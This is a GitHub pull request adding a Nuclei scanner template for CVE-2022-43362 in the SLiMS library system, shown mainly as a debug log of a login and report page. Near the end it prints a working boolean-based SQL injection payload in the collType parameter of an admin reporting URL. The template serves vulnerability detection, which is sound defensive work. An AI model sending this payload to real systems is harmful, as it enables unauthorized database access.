Add CVE-2022-43362.yaml #11569

Open
wants to merge 1 commit into
base: main

nblirwn
Contributor

@nblirwn nblirwn commented Feb 2, 2025

Template / PR Information

Template Validation

I've validated this template locally?

  • YES
  • NO

Debug

$ nuclei -t CVE-2022-43362.yaml -u http://localhost:8089 -var username=admin -var password=admin --debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.3.7

                projectdiscovery.io

[INF] Current nuclei version: v3.3.7 (outdated)
[INF] Current nuclei-templates version: v10.1.2 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 52
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2022-43362] Dumped HTTP request for http://localhost:8089/bulian/index.php?p=login

GET /bulian/index.php?p=login HTTP/1.1
Host: localhost:8089
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

[DBG] [CVE-2022-43362] Dumped HTTP response http://localhost:8089/bulian/index.php?p=login

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Sun, 02 Feb 2025 14:46:42 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.4.41 (Win64) PHP/7.4.16
Set-Cookie: SenayanMember=ctc0q73m5pf337930qvs8lj7mg; expires=Mon, 03-Feb-2025 02:46:42 GMT; Max-Age=43200; path=/bulian/; HttpOnly
X-Powered-By: PHP/7.4.16

<!--
# ===============================
# Classic SLiMS Template
# ===============================
# @Author: Waris Agung Widodo
# @Email:  [email protected]
# @Date:   2018-01-23T11:25:57+07:00
# @Last modified by:   Waris Agung Widodo
# @Last modified time: 2019-01-03T11:25:57+07:00
-->
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>Library Automation Login | Senayan</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <meta http-equiv="Pragma" content="no-cache"/>
    <meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate, post-check=0, pre-check=0"/>
    <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>
    <meta name="robots" content="noindex, follow">        <meta name="description" content="Library Automation Login | Senayan">
      <meta name="keywords" content="Open Source Library Management System">
      <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1">
    <meta name="generator" content="SLiMS 9 (Bulian)">
    <meta name="theme-color" content="#000">

    <meta property="og:locale" content="en_US"/>
    <meta property="og:type" content="book"/>
    <meta property="og:title" content="Library Automation Login | Senayan"/>
        <meta property="og:description" content="Open Source Library Management System"/>
      <meta property="og:url" content="//localhost%2Fbulian%2Findex.php%3Fp%3Dlogin"/>
    <meta property="og:site_name" content="Senayan"/>
        <meta property="og:image"
            content="//localhost/bulian/template/default/img/logo.png"/>

    <meta name="twitter:card" content="summary">
    <meta name="twitter:url" content="//localhost%2Fbulian%2Findex.php%3Fp%3Dlogin"/>
    <meta name="twitter:title" content="Library Automation Login | Senayan"/>
        <meta property="twitter:image"
            content="//localhost/bulian/template/default/img/logo.png"/>
      <!-- // load bootstrap style -->
    <link rel="stylesheet" href="template/default/assets/css/bootstrap.min.css">
    <!-- // font awesome -->
    <link rel="stylesheet" href="template/default/assets/plugin/font-awesome/css/fontawesome-all.min.css">
    <!-- Tailwind CSS -->
    <link rel="stylesheet" href="template/default/assets/css/tailwind.min.css">
    <!-- Vegas CSS -->
    <link rel="stylesheet" href="template/default/assets/plugin/vegas/vegas.min.css">
    <link href="/bulian/js/toastr/toastr.min.css?28094642" rel="stylesheet" type="text/css"/>
    <!-- SLiMS CSS -->
    <link rel="stylesheet" href="/bulian/js/colorbox/colorbox.css">
    <!-- // Flag css -->
    <link rel="stylesheet" href="template/default/assets/css/flag-icon.min.css">
    <!-- // my custom style -->
    <link rel="stylesheet" href="template/default/assets/css/style.css?v=20250202-094642">

    <link rel="shortcut icon" href="webicon.ico" type="image/x-icon"/>

    <!-- // load vue js -->
    <script src="template/default/assets/js/vue.min.js"></script>
    <!-- // load jquery library -->
    <script src="template/default/assets/js/jquery.min.js"></script>
    <!-- // load popper javascript -->
    <script src="template/default/assets/js/popper.min.js"></script>
    <!-- // load bootstrap javascript -->
    <script src="template/default/assets/js/bootstrap.min.js"></script>
    <!-- // load vegas javascript -->
    <script src="template/default/assets/plugin/vegas/vegas.min.js"></script>
    <script src="/bulian/js/toastr/toastr.min.js"></script>
    <!-- // load SLiMS javascript -->
    <script src="/bulian/js/colorbox/jquery.colorbox-min.js"></script>
    <script src="/bulian/js/gui.js"></script>
    <script src="/bulian/js/fancywebsocket.js"></script>

</head>
<body class="bg-grey-lightest">

<div class="result-search pb-5">
    <section id="section1 container-fluid">
        <header class="c-header">
            <div class="mask"></div>

<nav class="navbar navbar-expand-lg navbar-dark bg-transparent">
    <a class="navbar-brand inline-flex items-center" href="index.php">
                <svg
            class="fill-current text-white inline-block h-8 w-8"
            version="1.1"
            xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
            viewBox="0 0 118.4 135" style="enable-background:new 0 0 118.4 135;"
            xml:space="preserve">
                <path d="M118.3,98.3l0-62.3l0-0.2c-0.1-1.6-1-3-2.3-3.9c-0.1,0-0.1-0.1-0.2-0.1L61.9,0.8c-1.7-1-3.9-1-5.4-0.1l-54,31.1
                l-0.4,0.2C0.9,33,0.1,34.4,0,36c0,0.1,0,0.2,0,0.3l0,62.4l0,0.3c0.1,1.6,1,3,2.3,3.9c0.1,0.1,0.2,0.1,0.2,0.2l53.9,31.1l0.3,0.2
                c0.8,0.4,1.6,0.6,2.4,0.6c0.8,0,1.5-0.2,2.2-0.5l53.9-31.1c0.3-0.1,0.6-0.3,0.9-0.5c1.2-0.9,2-2.3,2.1-3.7c0-0.1,0-0.3,0-0.4
                C118.4,98.6,118.3,98.5,118.3,98.3z M114.4,98.8c0,0.3-0.2,0.7-0.5,0.9c-0.1,0.1-0.2,0.1-0.2,0.1l-20.6,11.9L59.2,92.1l-33.9,19.6
                L4.6,99.7l0,0l0,0C4.2,99.5,4,99.2,4,98.8l0-62.5l0,0l0-0.1c0-0.4,0.2-0.7,0.5-0.9l20.8-12l33.9,19.6l33.9-19.6l20.6,11.9l0.1,0
                c0.3,0.2,0.5,0.5,0.6,0.9l0,62.3L114.4,98.8L114.4,98.8z M95.3,68.6v39.4L23.1,66.4V26.9L95.3,68.6z"/>
         </svg>
                <div class="inline-flex flex-col leading-tight ml-2">
            <h1 class="text-lg m-0 p-0">Senayan</h1>
                    </div>
    </a>
    <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
        <span class="navbar-toggler-icon"></span>
    </button>

    <div class="collapse navbar-collapse" id="navbarSupportedContent">
        <ul class="navbar-nav ml-auto">
          <li class="nav-item ">
    <a class="nav-link" href="index.php">Home</a>
</li><li class="nav-item ">
    <a class="nav-link" href="index.php?p=libinfo">Information</a>
</li><li class="nav-item ">
    <a class="nav-link" href="index.php?p=news">News</a>
</li><li class="nav-item ">
    <a class="nav-link" href="index.php?p=help">Help</a>
</li><li class="nav-item ">
    <a class="nav-link" href="index.php?p=librarian">Librarian</a>
</li>                        <li class="nav-item ">
                  <a class="nav-link" href="index.php?p=member">Member Area</a>
              </li>
                      <li class="nav-item dropdown">
                              <a class="nav-link dropdown-toggle cursor-pointer" type="button" id="languageMenuButton"
                   data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                    <span class="flag-icon flag-icon-us" style="border-radius: 2px;"></span>
                </a>
                <div class="dropdown-menu bg-grey-lighter dropdown-menu-lg-right" aria-labelledby="dropdownMenuButton">
                    <h6 class="dropdown-header">Select Language : </h6>
                      <a class="dropdown-item" href="index.php?select_lang=ar_SA">
        <span class="flag-icon flag-icon-sa mr-2" style="border-radius: 2px;"></span> Arabic
    </a>    <a class="dropdown-item" href="index.php?select_lang=bn_BD">
        <span class="flag-icon flag-icon-bd mr-2" style="border-radius: 2px;"></span> Bengali
    </a>    <a class="dropdown-item" href="index.php?select_lang=pt_BR">
        <span class="flag-icon flag-icon-br mr-2" style="border-radius: 2px;"></span> Brazilian Portuguese
    </a>    <a class="dropdown-item" href="index.php?select_lang=en_US">
        <span class="flag-icon flag-icon-us mr-2" style="border-radius: 2px;"></span> English
    </a>    <a class="dropdown-item" href="index.php?select_lang=es_ES">
        <span class="flag-icon flag-icon-es mr-2" style="border-radius: 2px;"></span> Espanol
    </a>    <a class="dropdown-item" href="index.php?select_lang=de_DE">
        <span class="flag-icon flag-icon-de mr-2" style="border-radius: 2px;"></span> German
    </a>    <a class="dropdown-item" href="index.php?select_lang=id_ID">
        <span class="flag-icon flag-icon-id mr-2" style="border-radius: 2px;"></span> Indonesian
    </a>    <a class="dropdown-item" href="index.php?select_lang=ja_JP">
        <span class="flag-icon flag-icon-jp mr-2" style="border-radius: 2px;"></span> Japanese
    </a>    <a class="dropdown-item" href="index.php?select_lang=my_MY">
        <span class="flag-icon flag-icon-my mr-2" style="border-radius: 2px;"></span> Malay
    </a>    <a class="dropdown-item" href="index.php?select_lang=fa_IR">
        <span class="flag-icon flag-icon-ir mr-2" style="border-radius: 2px;"></span> Persian
    </a>    <a class="dropdown-item" href="index.php?select_lang=ru_RU">
        <span class="flag-icon flag-icon-ru mr-2" style="border-radius: 2px;"></span> Russian
    </a>    <a class="dropdown-item" href="index.php?select_lang=th_TH">
        <span class="flag-icon flag-icon-th mr-2" style="border-radius: 2px;"></span> Thai
    </a>    <a class="dropdown-item" href="index.php?select_lang=tr_TR">
        <span class="flag-icon flag-icon-tr mr-2" style="border-radius: 2px;"></span> Turkish
    </a>    <a class="dropdown-item" href="index.php?select_lang=ur_PK">
        <span class="flag-icon flag-icon-pk mr-2" style="border-radius: 2px;"></span> Urdu
    </a>                </div>
            </li>
        </ul>
    </div>
</nav>
        </header>
      <div class="search" id="search-wraper" xmlns:v-bind="http://www.w3.org/1999/xhtml">
    <div class="container">
        <div class="row">
            <div class="col-lg-8 mx-auto">
                <div class="card border-0 shadow">
                    <div class="card-body">
                        <form class="" action="index.php" method="get" @submit.prevent="searchSubmit">
                            <input type="hidden" name="search" value="search">
                            <input ref="keywords" value="" v-model.trim="keywords"
                                   @focus="searchOnFocus" @blur="searchOnBlur" type="text" id="search-input"
                                   name="keywords" class="input-transparent w-100" autocomplete="off"
                                   placeholder="Enter keyword to search collection..."/>
                        </form>
                    </div>
                </div>
                <transition name="slide-fade">
                    <div v-if="show" class="advanced-wraper shadow mt-4" id="advanced-wraper"
                         v-click-outside="hideSearch">
                        <p class="label mb-2">
                            Search by :                            <i @click="hideSearch"
                               class="far fa-times-circle float-right text-danger cursor-pointer"></i>
                        </p>
                        <div class="d-flex flex-wrap">
                            <a v-bind:class="{'btn-primary text-white': searchBy === 'keywords', 'btn-outline-secondary': searchBy !== 'keywords' }"
                               @click="searchOnClick('keywords')" class="btn mr-2 mb-2">ALL</a>
                            <a v-bind:class="{'btn-primary text-white': searchBy === 'author', 'btn-outline-secondary': searchBy !== 'author' }"
                               @click="searchOnClick('author')" class="btn mr-2 mb-2">Author</a>
                            <a v-bind:class="{'btn-primary text-white': searchBy === 'subject', 'btn-outline-secondary': searchBy !== 'subject' }"
                               @click="searchOnClick('subject')" class="btn mr-2 mb-2">Subject</a>
                            <a v-bind:class="{'btn-primary text-white': searchBy === 'isbn', 'btn-outline-secondary': searchBy !== 'isbn' }"
                               @click="searchOnClick('isbn')" class="btn mr-2 mb-2">ISBN/ISSN</a>
                            <button class="btn btn-light mr-2 mb-2" disabled>OR TRY</button>
                            <a class="btn btn-outline-primary mr-2 mb-2" data-toggle="modal" data-target="#adv-modal">Advanced Search</a>
                        </div>
                        <p v-if="lastKeywords.length > 0" class="label mt-4">Last search:</p>
                        <a :href="`index.php?${tmpObj[k].searchBy}=${tmpObj[k].text}&search=search`"
                           class="flex items-center justify-between py-1 text-decoration-none text-grey-darkest hover:text-blue"
                           v-for="k in lastKeywords" :key="k"><span><i
                                        class="far fa-clock text-grey-dark mr-2"></i><span class="italic text-sm">{{tmpObj[k].text}}</span></span><i
                                    class="fas fa-angle-right text-grey-dark"></i></a>
                    </div>
                </transition>
            </div>
        </div>
    </div>
</div>
    </section>

    <section class="container mt-8">
      <h2 class="mb-4">Library Automation Login | Senayan</h2><hr><div id="loginForm">
    <noscript>
        <div style="font-weight: bold; color: #FF0000;">Your browser does not support Javascript or Javascript is disabled. Application won't run without Javascript!<div>
    </noscript>
    <form action="index.php?p=login" method="post">
            <div class="heading1">Username</div>
        <div class="login_input"><input type="text" name="userName" id="userName" class="login_input" required /></div>
        <div class="heading1">Password</div>
        <div class="login_input"><input type="password" name="passWord" class="login_input" autocomplete="off" required /></div>
        <input type="hidden" name="_csrf_token_645a83a41868941e4692aa31e7235f2" value="8d9b8cb7f522738a7b45cd09ffd707aaa6c03071"/>        <!-- Captcha in form - start -->
                <!-- Captcha in form - end -->

        <div class="marginTop">
        <div class="remember_forgot">
            <div class="remember">
                                <input type="checkbox" id="remember_me" name="remember" value="1">
                <label for="remember_me">Remember me</label>
                            </div>
        </div>
        <input type="submit" name="logMeIn" value="Login" class="loginButton" />
        <input type="button" value="Home" class="homeButton" onclick="javascript: location.href = 'index.php';" />
        <a class="forgotButton" href="index.php?p=forgot">Forgot my password</a>
        </div>
        </form>
</div>
<script type="text/javascript">jQuery('#userName').focus();</script>

    </section>
</div>


<footer class="py-4 bg-grey-darkest text-grey-lighter">
    <div class="container">
        <div class="row py-4">
            <div class="col-md-3">
                                <svg
                          class="fill-current text-grey-lighter block h-12 w-12 mb-2"
                          version="1.1"
                          xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
                          viewBox="0 0 118.4 135" style="enable-background:new 0 0 118.4 135;"
                          xml:space="preserve">
                    <path d="M118.3,98.3l0-62.3l0-0.2c-0.1-1.6-1-3-2.3-3.9c-0.1,0-0.1-0.1-0.2-0.1L61.9,0.8c-1.7-1-3.9-1-5.4-0.1l-54,31.1
                    l-0.4,0.2C0.9,33,0.1,34.4,0,36c0,0.1,0,0.2,0,0.3l0,62.4l0,0.3c0.1,1.6,1,3,2.3,3.9c0.1,0.1,0.2,0.1,0.2,0.2l53.9,31.1l0.3,0.2
                    c0.8,0.4,1.6,0.6,2.4,0.6c0.8,0,1.5-0.2,2.2-0.5l53.9-31.1c0.3-0.1,0.6-0.3,0.9-0.5c1.2-0.9,2-2.3,2.1-3.7c0-0.1,0-0.3,0-0.4
                    C118.4,98.6,118.3,98.5,118.3,98.3z M114.4,98.8c0,0.3-0.2,0.7-0.5,0.9c-0.1,0.1-0.2,0.1-0.2,0.1l-20.6,11.9L59.2,92.1l-33.9,19.6
                    L4.6,99.7l0,0l0,0C4.2,99.5,4,99.2,4,98.8l0-62.5l0,0l0-0.1c0-0.4,0.2-0.7,0.5-0.9l20.8-12l33.9,19.6l33.9-19.6l20.6,11.9l0.1,0
                    c0.3,0.2,0.5,0.5,0.6,0.9l0,62.3L114.4,98.8L114.4,98.8z M95.3,68.6v39.4L23.1,66.4V26.9L95.3,68.6z"/>
                </svg>
                              <div class="mb-4">Senayan</div>
                <ul class="list-reset">
                    <li><a class="text-light" href="index.php?p=libinfo">Information</a></li>
                    <li><a class="text-light" href="index.php?p=services">Services</a></li>
                    <li><a class="text-light" href="index.php?p=librarian">Librarian</a></li>
                    <li><a class="text-light" href="index.php?p=member">Member Area</a></li>
                </ul>
            </div>
            <div class="col-md-5 pt-8 md:pt-0">
                <h4 class="mb-4">About Us</h4>
                <p>
                    <p>As a complete Library Management System, SLiMS (Senayan Library Management System) has many features that will help libraries and librarians to do their job easily
and quickly. Follow <a target="_blank" href="https://slims.web.id/web/pages/about/">this link</a> to show some features provided by SLiMS.</p>                </p>
            </div>
            <div class="col-md-4 pt-8 md:pt-0">
                <h4 class="mb-4">Search</h4>
                <div class="mb-2">start it by typing one or more keywords for title, author or subject</div>
                <form action="index.php">
                    <div class="input-group mb-3">
                        <input name="keywords" type="text" class="form-control"
                               placeholder="Enter keywords"
                               aria-label="Enter keywords"
                               aria-describedby="button-addon2">
                        <div class="input-group-append">
                            <button class="btn btn-primary" type="submit" value="search" name="search"
                                    id="button-addon2">Find Collection                            </button>
                        </div>
                    </div>
                </form>
                <hr>
                <a target="_blank" title="Support Us" class="btn btn-outline-success mb-2"
                   href="https://slims.web.id/web/pages/support-us/"><i
                            class="fas fa-heart mr-2"></i>Keep SLiMS Alive</a>
                <a target="_blank" title="Contribute" class="btn btn-outline-light mb-2"
                   href="https://github.com/slims/"><i
                            class="fab fa-github mr-2"></i>Want to Contribute?</a>
            </div>
        </div>
        <hr>
        <div class="flex font-thin text-sm">
            <p class="flex-1">&copy; 2025 &mdash; Senayan Developer Community</p>
            <div class="flex-1 text-right text-grey">Powered by <code>SLiMS</code></div>
        </div>
    </div>
</footer>



<!-- // Load modal -->

<div class="modal fade" id="exampleModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel"
     aria-hidden="true">
    <div class="modal-dialog modal-lg" role="document">
        <div class="modal-content">
            <div class="modal-header">
                <h5 class="modal-title" id="exampleModalLabel">Select the topic you are interested in</h5>
                <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                    <span aria-hidden="true">&times;</span>
                </button>
            </div>
            <div class="modal-body">
                <ul class="topic d-flex flex-wrap justify-content-center p-0">
                    <li class="d-flex justify-content-center align-items-center m-2">
                        <a href="index.php?callnumber=0&search=search" class="d-flex flex-column">
                            <img src="template/default/assets/images/0-chemical.png" width="80" class="mb-3 mx-auto"/>
                            Computer Science, Information & General Works                        </a>
                    </li>
                    <li class="d-flex justify-content-center align-items-center m-2">
                        <a href="index.php?callnumber=1&search=search" class="d-flex flex-column">
                            <img src="template/default/assets/images/1-memory.png" width="80" class="mb-3 mx-auto"/>
                            Philosophy & Psychology                        </a>
                    </li>
                    <li class="d-flex justify-content-center align-items-center m-2">
                        <a href="index.php?callnumber=2&search=search" class="d-flex flex-column">
                            <img src="template/default/assets/images/2-mosque.png" width="80" class="mb-3 mx-auto"/>
                            Religion                        </a>
                    </li>
                    <li class="d-flex justify-content-center align-items-center m-2">
                        <a href="index.php?callnumber=3&search=search" class="d-flex flex-column">
                            <img src="template/default/assets/images/3-diploma.png" width="80" class="mb-3 mx-auto"/>
                            Social Sciences                        </a>
                    </li>
                    <li class="d-flex justify-content-center align-items-center m-2">
                        <a href="index.php?callnumber=4&search=search" class="d-flex flex-column">
                            <img src="template/default/assets/images/4-translation.png" width="80" class="mb-3 mx-auto"/>
                            Language                        </a>
                    </li>
                    <li class="d-flex justify-content-center align-items-center m-2">
                        <a href="index.php?callnumber=5&search=search" class="d-flex flex-column">
                            <img src="template/default/assets/images/5-math.png" width="80" class="mb-3 mx-auto"/>
                            Pure Science                        </a>
                    </li>
                    <li class="d-flex justify-content-center align-items-center m-2">
                        <a href="index.php?callnumber=6&search=search" class="d-flex flex-column">
                            <img src="template/default/assets/images/6-blackboard.png" width="80" class="mb-3 mx-auto"/>
                            Applied Sciences                        </a>
                    </li>
                    <li class="d-flex justify-content-center align-items-center m-2">
                        <a href="index.php?callnumber=7&search=search" class="d-flex flex-column">
                            <img src="template/default/assets/images/7-quill.png" width="80" class="mb-3 mx-auto"/>
                            Art & Recreation                        </a>
                    </li>
                    <li class="d-flex justify-content-center align-items-center m-2">
                        <a href="index.php?callnumber=8&search=search" class="d-flex flex-column">
                            <img src="template/default/assets/images/8-books.png" width="80" class="mb-3 mx-auto"/>
                            Literature                        </a>
                    </li>
                    <li class="d-flex justify-content-center align-items-center m-2">
                        <a href="index.php?callnumber=9&search=search" class="d-flex flex-column">
                            <img src="template/default/assets/images/9-return-to-the-past.png" width="80" class="mb-3 mx-auto"/>
                            History & Geography                        </a>
                    </li>
                </ul>
            </div>
            <div class="modal-footer text-muted text-sm">
                <div>Icons made by <a href="http://www.freepik.com" title="Freepik">Freepik</a> from <a href="https://www.flaticon.com/" title="Flaticon">www.flaticon.com</a></div>
            </div>
        </div>
    </div>
</div>

<div class="modal fade" id="adv-modal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel"
     aria-hidden="true">
    <div class="modal-dialog modal-lg" role="document">
        <form class="modal-content" action="index.php" method="get">
            <div class="modal-header">
                <h5 class="modal-title" id="exampleModalLabel">Advanced Search</h5>
                <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                    <span aria-hidden="true">&times;</span>
                </button>
            </div>
            <div class="modal-body">
                <div class="row">
                    <div class="col">
                        <div class="form-group">
                            <label for="adv-titles">Title</label>
                            <input type="text" name="title" class="form-control" id="adv-titles"
                                   placeholder="Enter title">
                        </div>
                    </div>
                    <div class="col">
                        <div class="form-group">
                            <label for="adv-author">Author(s)</label>
                            <input type="text" name="author" class="form-control" id="adv-author"
                                   placeholder="Enter author(s) name">
                        </div>
                    </div>
                </div>
                <div class="row">
                    <div class="col">
                        <div class="form-group">
                            <label for="adv-subject">Subject(s)</label>
                            <input type="text" name="subject" class="form-control" id="adv-subject"
                                   placeholder="Enter subject">
                        </div>
                    </div>
                    <div class="col">
                        <div class="form-group">
                            <label for="adv-isbn">ISBN/ISSN</label>
                            <input type="text" name="isbn" class="form-control" id="adv-isbn"
                                   placeholder="Enter ISBN/ISSN">
                        </div>
                    </div>
                </div>
                <div class="row">
                    <div class="col">
                        <div class="form-group">
                            <label for="adv-coll-type">Collection Type</label>
                            <select name="colltype" class="form-control"
                                    id="adv-coll-type"><option value="0">All Collections</option><option value="Fiction">Fiction</option><option value="Reference">Reference</option><option value="Textbook">Textbook</option></select>
                        </div>
                    </div>
                    <div class="col">
                        <div class="form-group">
                            <label for="adv-location">Location</label>
                            <select id="adv-location" name="location"
                                    class="form-control"> <option value="0">All Locations</option><option value="My Library">My Library</option></select>
                        </div>
                    </div>
                </div>
                <div class="row">
                    <div class="col">
                        <div class="form-group">
                            <label for="adv-gmd">GMD</label>
                            <select id="adv-gmd" name="gmd" class="form-control"><option value="0">All GMD/Media</option><option value="Art Original">Art Original</option><option value="Cartographic Material">Cartographic Material</option><option value="CD-ROM">CD-ROM</option><option value="Chart">Chart</option><option value="Computer File">Computer File</option><option value="Computer Software">Computer Software</option><option value="Digital Versatile Disc">Digital Versatile Disc</option><option value="Diorama">Diorama</option><option value="Electronic Resource">Electronic Resource</option><option value="Equipment">Equipment</option><option value="Filmstrip">Filmstrip</option><option value="Flash Card">Flash Card</option><option value="Game">Game</option><option value="Globe">Globe</option><option value="Kit">Kit</option><option value="Manuscript">Manuscript</option><option value="Map">Map</option><option value="Microform">Microform</option><option value="Microscope Slide">Microscope Slide</option><option value="Model">Model</option><option value="Motion Picture">Motion Picture</option><option value="Multimedia">Multimedia</option><option value="Music">Music</option><option value="Picture">Picture</option><option value="Realia">Realia</option><option value="Slide">Slide</option><option value="Sound Recording">Sound Recording</option><option value="Technical Drawing">Technical Drawing</option><option value="Text">Text</option><option value="Transparency">Transparency</option><option value="Video Recording">Video Recording</option></select>
                        </div>
                    </div>
                    <div class="col"></div>
                </div>
            </div>
            <div class="modal-footer">
                <button type="submit" name="search" value="search" class="btn btn-primary">Find Collection</button>
            </div>
        </form>
    </div>
</div>

<!-- // Load highlight -->
<script src="/bulian/js/highlight.js"></script>

<!-- // load our vue app.js -->
<script src="template/default/assets/js/app.js?v=20250202-094642"></script>
<script src="template/default/assets/js/app_jquery.js?v=20250202-094642"></script>

<script>
  $('.c-header, .vegas-slide').vegas({
        delay: 5000,
        timer: false,
        transition: 'blur',
        animation: 'none',
        slides: [
            { src: "template/default/assets/images/slide1.jpg" },
            { src: "template/default/assets/images/slide2.jpg" },
            { src: "template/default/assets/images/slide3.jpg" },
            { src: "template/default/assets/images/slide4.jpg" }
        ]
    });
</script>
</body>
</html>
[INF] [CVE-2022-43362] Dumped HTTP request for http://localhost:8089/bulian/index.php?p=login

POST /bulian/index.php?p=login HTTP/1.1
Host: localhost:8089
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Connection: close
Content-Length: 128
Content-Type: application/x-www-form-urlencoded
Cookie: SenayanMember=ctc0q73m5pf337930qvs8lj7mg
Accept-Encoding: gzip

userName=admin&passWord=admin&_csrf_token_645a83a41868941e4692aa31e7235f2=8d9b8cb7f522738a7b45cd09ffd707aaa6c03071&logMeIn=Login
[DBG] [CVE-2022-43362] Dumped HTTP response http://localhost:8089/bulian/index.php?p=login

HTTP/1.1 200 OK
Connection: close
Content-Length: 82
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Sun, 02 Feb 2025 14:46:42 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.4.41 (Win64) PHP/7.4.16
Set-Cookie: SenayanMember=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/bulian/
Set-Cookie: SenayanAdmin=9chli4o7c6ai4sp5of2doce0kv; expires=Mon, 03-Feb-2025 14:46:42 GMT; Max-Age=86400; path=/bulian/admin/; HttpOnly
Set-Cookie: SenayanAdmin=7sta0e20mjebti36aho0gti7q6; expires=Mon, 03-Feb-2025 14:46:42 GMT; Max-Age=86400; path=/bulian/admin/; HttpOnly
Set-Cookie: admin_logged_in=1; expires=Sun, 02-Feb-2025 18:46:42 GMT; Max-Age=14400; path=/bulian/
X-Powered-By: PHP/7.4.16

<script type="text/javascript">location.href = '/bulian/admin/index.php';</script>
[INF] [CVE-2022-43362] Dumped HTTP request for http://localhost:8089/bulian/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=bbbb&membershipType=a&collType=aaaa%27%20AND%203045=(SELECT%20(CASE%20WHEN%20(3045=3045)%20THEN%203045%20ELSE%20(SELECT%203726%20UNION%20SELECT%205145)%20END))--%20-

GET /bulian/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=bbbb&membershipType=a&collType=aaaa%27%20AND%203045=(SELECT%20(CASE%20WHEN%20(3045=3045)%20THEN%203045%20ELSE%20(SELECT%203726%20UNION%20SELECT%205145)%20END))--%20- HTTP/1.1
Host: localhost:8089
User-Agent: Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Connection: close
Cookie: SenayanAdmin=7sta0e20mjebti36aho0gti7q6; admin_logged_in=1
Accept-Encoding: gzip

[DBG] [CVE-2022-43362] Dumped HTTP response http://localhost:8089/bulian/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=bbbb&membershipType=a&collType=aaaa%27%20AND%203045=(SELECT%20(CASE%20WHEN%20(3045=3045)%20THEN%203045%20ELSE%20(SELECT%203726%20UNION%20SELECT%205145)%20END))--%20-

HTTP/1.1 200 OK
Connection: close
Content-Length: 3623
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Sun, 02 Feb 2025 14:46:42 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.4.41 (Win64) PHP/7.4.16
X-Powered-By: PHP/7.4.16

<!doctype html>
<html>
<head><title>Loan Report by Class Report</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <meta http-equiv="Pragma" content="no-cache"/>
    <meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate, post-check=0, pre-check=0"/>
    <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>
    <link rel="stylesheet" type="text/css" href="/bulian/css/bootstrap.min.css"/>
    <link rel="stylesheet" type="text/css" href="/bulian/admin/admin_template/default/style.css?28094642"/>
    <script type="text/javascript" src="/bulian/js/jquery.js"></script>
    <script type="text/javascript" src="/bulian/js/gui.js"></script>
</head>
<body>
<div id="pageContent">
  <div class="mb-2">Loan Recap By Class <strong>bbbb</strong> for year <strong>2002</strong> <a class="s-btn btn btn-default printReport" onclick="window.print()" href="#">Print Current Page</a><a href="../xlsoutput.php" class="s-btn btn btn-default" target="_BLANK">Export to spreadsheet format</a>
    <a class="s-btn btn btn-info notAJAX openPopUp" href="/bulian/admin/modules/reporting/pop_chart.php" width="700" height="530" title="Loan Recap By Class">Show in chart/plot</a></div>
